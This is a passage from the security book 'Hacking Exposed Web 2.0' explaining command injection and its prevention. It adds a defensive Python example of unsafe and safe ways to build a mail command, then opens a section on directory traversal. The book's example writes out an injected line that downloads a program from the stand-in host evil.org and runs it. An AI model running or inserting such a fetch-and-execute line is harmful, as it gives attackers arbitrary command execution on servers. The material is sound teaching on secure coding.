
Rich Cannings, Himanshu Dwivedi, Zane Lackey, and Alex Stamos

"Hacking Exposed Web 2.0: Web 2.0 Security Secrets and Solutions"

org/attack_program; ./attack_program #
Adding this piece to the puzzle creates the following shell command:
mail --help; wget http://evil.org/attack_program;
./attack_program # s 'some subject' < /tmp/email_body
This is equivalent to this:
mail --help; wget http://evil.org/attack_program; ./attack_program
This runs mail --help, then downloads attack_program from evil.org and
executes it, allowing the attacker to run arbitrary commands on the vulnerable
web site.
Preventing Command Injection
Preventing command injection is similar to preventing SQL injection. The developer
must escape the user input appropriately before running a command with that input. It
may seem that escaping the semicolon (;) to backslash-semicolon (\;) would fix the problem.
However, the attacker could use a double ampersand (&&) or possibly a double bar (||)
instead of the semicolon. The correct escaping depends heavily on the shell that executes
the command, so developers should use the escape routine provided for that shell rather
than writing their own.
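The three options above, as an added example that is not from the book: a Python handler that builds the chapter's mail command unsafely, with proper quoting, and with no shell at all, plus a shlex-based approximation of the shell's word splitting that counts how many commands each string would run. The subject strings, file path and helper names are constructed for this illustration.

```python
import shlex
import subprocess

# Operators a POSIX shell uses to chain commands; any of them in user input is the
# attack surface the chapter describes (';' is just the most obvious one).
COMMAND_SEPARATORS = {";", "&&", "||", "|", "&"}

# Constructed sample inputs (hypothetical): a normal subject and two injected ones
# shaped like the chapter's payload, using a harmless echo instead of wget.
BENIGN_SUBJECT = "Quarterly report"
SEMICOLON_PAYLOAD = "'; echo INJECTED #"
AMPERSAND_PAYLOAD = "' && echo INJECTED #"


def build_unsafe_command(subject: str) -> str:
    """Vulnerable pattern: the subject is pasted between quotes in a shell string."""
    return "mail -s '" + subject + "' < /tmp/email_body"


def naive_escape(subject: str) -> str:
    """The insufficient fix the chapter warns about: only ';' is escaped."""
    return subject.replace(";", "\\;")


def build_quoted_command(subject: str) -> str:
    """Shell-string form done properly: shlex.quote always yields one shell word."""
    return "mail -s " + shlex.quote(subject) + " < /tmp/email_body"


def send_mail_safely(subject: str, body_path: str) -> int:
    """Preferred form: argv list and no shell, so no escaping routine is needed."""
    with open(body_path, "rb") as body:
        return subprocess.run(["mail", "-s", subject], stdin=body, check=False).returncode


def count_shell_commands(command: str) -> int:
    """Approximate a POSIX shell's word splitting with shlex and count the separate
    commands the line would run (1 means the user input stayed plain data)."""
    lex = shlex.shlex(command, posix=True, punctuation_chars=True)
    lex.whitespace_split = True
    lex.commenters = "#"  # a trailing '#' hides the rest of the line, as in the chapter
    return 1 + sum(1 for token in lex if token in COMMAND_SEPARATORS)
```

send_mail_safely is the form to use in a real handler; the string-building functions exist only to show what the shell would see.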
Directory Traversal Attacks
Popularity: 9
Simplicity: 9
Impact: 8
Risk Rating: 8
Attackers use directory traversal attacks to read arbitrary files on web servers, such
as SSL private keys and password files.

